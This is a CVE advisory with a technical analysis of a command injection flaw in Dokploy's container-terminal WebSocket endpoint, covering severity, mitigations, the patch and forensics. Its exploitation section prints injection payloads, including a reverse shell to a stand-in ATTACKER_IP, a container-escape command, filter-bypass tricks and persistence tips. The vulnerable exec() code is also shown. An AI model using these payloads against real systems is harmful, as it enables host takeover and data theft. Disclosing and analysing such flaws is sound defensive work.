CVE-2026-24841
CVE-2026-24841
9.9
CriticalPublished:
Last updated:
Source:security-advisories@github.com
Analyzed
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- Low
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- Low
Description
Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameters are directly interpolated into shell commands without sanitization, allowing authenticated attackers to execute arbitrary commands on the host server. Version 0.26.6 fixes the issue.
Comprehensive Technical Analysis of CVE-2026-24841
Dokploy Command Injection Vulnerability (CVSS 9.9)
1. Vulnerability Assessment and Severity Evaluation
CVE-2026-24841 is a critical command injection vulnerability in Dokploy, a self-hosted Platform-as-a-Service (PaaS) solution. The flaw resides in the WebSocket endpoint /docker-container-terminal, where user-supplied input (containerId and activeWay) is directly interpolated into shell commands without proper sanitization.
Severity Justification (CVSS 9.9 - Critical)
| CVSS Metric | Score | Rationale |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely via WebSocket. |
| Attack Complexity (AC) | Low (L) | No specialized conditions required. |
| Privileges Required (PR) | Low (L) | Only authenticated access needed. |
| User Interaction (UI) | None (N) | No user interaction required. |
| Scope (S) | Changed (C) | Compromise affects the host system, not just the application. |
| Confidentiality (C) | High (H) | Arbitrary command execution leads to full data exposure. |
| Integrity (I) | High (H) | Attacker can modify files, configurations, or deploy malware. |
| Availability (A) | High (H) | Host system can be crashed or rendered unusable. |
Key Takeaways:
- High Impact: Full host compromise possible.
- Low Attack Complexity: Exploitation requires minimal effort.
- Network-Exploitable: No physical access or local privileges needed.
- Authenticated Attack Required: Reduces risk slightly but does not mitigate severity.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper input validation in the WebSocket handler (docker-container-terminal.ts). The containerId and activeWay parameters are concatenated directly into shell commands, allowing command injection via metacharacters (e.g., ;, &&, |, `, $()).
Proof-of-Concept (PoC) Exploitation Steps:
- Authenticate to Dokploy (valid credentials required).
- Establish a WebSocket connection to
/docker-container-terminal. - Send a malicious payload in the
containerIdoractiveWayparameter:{ "containerId": "legitimate_container; id > /tmp/pwned;", "activeWay": "exec" } - Result: The
idcommand executes on the host, writing output to/tmp/pwned.
Advanced Exploitation Scenarios:
- Reverse Shell:
{ "containerId": "legitimate_container; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'", "activeWay": "exec" } - Container Escape & Host Compromise:
- If Dokploy runs in a container, an attacker could break out using:
{ "containerId": "legitimate_container; nsenter --target 1 --mount --uts --ipc --net --pid sh", "activeWay": "exec" }
- If Dokploy runs in a container, an attacker could break out using:
- Persistence & Lateral Movement:
- Deploy a cron job or SSH key for persistence.
- Exfiltrate sensitive data (e.g., Docker secrets, API keys).
3. Affected Systems and Software Versions
| Component | Affected Versions | Fixed Version |
|---|---|---|
| Dokploy | All versions < 0.26.6 | 0.26.6 |
| Dependencies | N/A (Self-contained) | N/A |
Deployment Scenarios at Risk:
- Self-hosted Dokploy instances (on-premises or cloud).
- Multi-tenant PaaS environments where Dokploy manages containers.
- CI/CD pipelines using Dokploy for deployment automation.
4. Recommended Mitigation Strategies
Immediate Actions (For Affected Users)
- Upgrade to Dokploy v0.26.6 (or later) immediately.
- Patch commit:
74e0bd5fe3ef7199f44fcd19c6f5a2f09b806d6f
- Patch commit:
- Isolate Dokploy Instances (if patching is delayed):
- Restrict network access to the WebSocket endpoint (
/docker-container-terminal). - Use firewall rules to limit connections to trusted IPs.
- Restrict network access to the WebSocket endpoint (
- Disable WebSocket Terminal Access (temporary workaround):
- Modify
docker-container-terminal.tsto disable the endpoint if not critical.
- Modify
Long-Term Security Hardening
- Input Validation & Sanitization:
- Whitelist allowed characters for
containerId(alphanumeric + hyphens/underscores). - Use parameterized shell commands (e.g.,
execFilein Node.js) instead of string interpolation.
- Whitelist allowed characters for
- Least Privilege Principle:
- Run Dokploy with minimal permissions (avoid
root). - Use Docker’s
--read-onlyand--cap-drop=ALLfor containers.
- Run Dokploy with minimal permissions (avoid
- Web Application Firewall (WAF) Rules:
- Deploy a WAF (e.g., ModSecurity, Cloudflare) to block command injection patterns.
- Runtime Protection:
- Use eBPF-based tools (e.g., Falco, Aqua Security) to detect anomalous shell executions.
- Network Segmentation:
- Isolate Dokploy in a dedicated VLAN with strict access controls.
- Logging & Monitoring:
- Enable audit logging for WebSocket connections.
- Set up SIEM alerts for suspicious command executions (e.g.,
;,&&,|).
5. Impact on the Cybersecurity Landscape
Broader Implications
- Supply Chain Risks:
- Dokploy is used in CI/CD pipelines, meaning a compromise could lead to malicious code deployment in downstream applications.
- Container Security Challenges:
- Highlights the danger of improper input handling in container management tools.
- Reinforces the need for secure coding practices in PaaS/IaaS solutions.
- Exploitation in the Wild:
- Given the CVSS 9.9 score, this vulnerability is highly attractive to attackers, including:
- APT groups (for lateral movement).
- Cryptojackers (for resource hijacking).
- Ransomware operators (for initial access).
- Given the CVSS 9.9 score, this vulnerability is highly attractive to attackers, including:
- Regulatory & Compliance Risks:
- Organizations using Dokploy may face compliance violations (e.g., GDPR, HIPAA, PCI-DSS) if exploited.
Historical Context
- Similar vulnerabilities:
- CVE-2021-41079 (Docker CLI command injection).
- CVE-2020-15257 (Containerd escape via API).
- Lessons Learned:
- Never trust user input, even in WebSocket APIs.
- Assume breach and implement defense-in-depth.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from unsafe string interpolation in docker-container-terminal.ts:
// Vulnerable Code (Pre-0.26.6)
const command = `docker exec -it ${containerId} ${activeWay}`;
exec(command, (error, stdout, stderr) => { ... });
- Problem:
containerIdandactiveWayare not sanitized, allowing command chaining via shell metacharacters.
Patch Analysis (Fixed in v0.26.6)
The fix introduces input validation and parameterized execution:
// Fixed Code (Post-0.26.6)
if (!/^[a-zA-Z0-9][a-zA-Z0-9_.-]*$/.test(containerId)) {
throw new Error("Invalid containerId");
}
const args = ["exec", "-it", containerId, activeWay];
const child = spawn("docker", args, { shell: false });
- Key Improvements:
- Regex validation for
containerId. spawninstead ofexec(avoids shell interpretation).shell: falseprevents command injection.
- Regex validation for
Exploitation Detection & Forensics
Indicators of Compromise (IoCs)
- Logs:
- Unusual
docker execcommands in/var/log/docker.logor/var/log/syslog. - WebSocket connections with suspicious payloads (e.g.,
;,&&,|).
- Unusual
- File System Artifacts:
- Unexpected files in
/tmp(e.g.,/tmp/pwned). - New SSH keys in
~/.ssh/authorized_keys.
- Unexpected files in
- Network Traffic:
- Outbound connections to unexpected IPs (reverse shells, C2 servers).
Forensic Investigation Steps
- Check WebSocket Logs:
grep -r "docker-container-terminal" /var/log/nginx/access.log - Inspect Docker Events:
docker events --since "2026-01-28" --filter event=exec_create - Analyze Running Processes:
ps aux | grep -E "docker exec|bash -c|nc -lvp" - Memory Forensics (Volatility):
volatility -f memory.dump linux_pslist | grep -i "docker"
Red Team & Penetration Testing Guidance
- Exploitation Tools:
- Burp Suite / OWASP ZAP (for WebSocket fuzzing).
- Metasploit (if a module is developed).
- Bypass Techniques (if patch is incomplete):
- URL-encoded payloads (e.g.,
%3Bfor;). - Alternative shell metacharacters (e.g.,
${IFS}for spaces).
- URL-encoded payloads (e.g.,
- Post-Exploitation:
- Container Breakout: Use
nsenterorcapshto escape. - Persistence: Add a cron job or systemd service.
- Container Breakout: Use
Conclusion & Recommendations
CVE-2026-24841 is a critical command injection vulnerability with severe real-world impact. Organizations using Dokploy must:
- Patch immediately to v0.26.6.
- Audit systems for signs of exploitation.
- Implement defense-in-depth (WAF, least privilege, monitoring).
For Security Teams:
- Prioritize patching in vulnerability management programs.
- Hunt for IoCs in logs and network traffic.
- Educate developers on secure coding practices for WebSocket APIs.
For Developers:
- Never use string interpolation for shell commands.
- Use parameterized execution (
spawn,execFile). - Validate all inputs with strict allowlists.
This vulnerability underscores the critical importance of input sanitization in modern cloud-native applications. Failure to address it could lead to full system compromise, data breaches, and lateral movement in enterprise environments.
References
security-advisories@github.com
https://github.com/Dokploy/dokploy/blob/canary/apps/dokploy/server/wss/docker-container-terminal.tssecurity-advisories@github.com
https://github.com/Dokploy/dokploy/commit/74e0bd5fe3ef7199f44fcd19c6f5a2f09b806d6fsecurity-advisories@github.com
https://github.com/Dokploy/dokploy/security/advisories/GHSA-vx6x-6559-x35r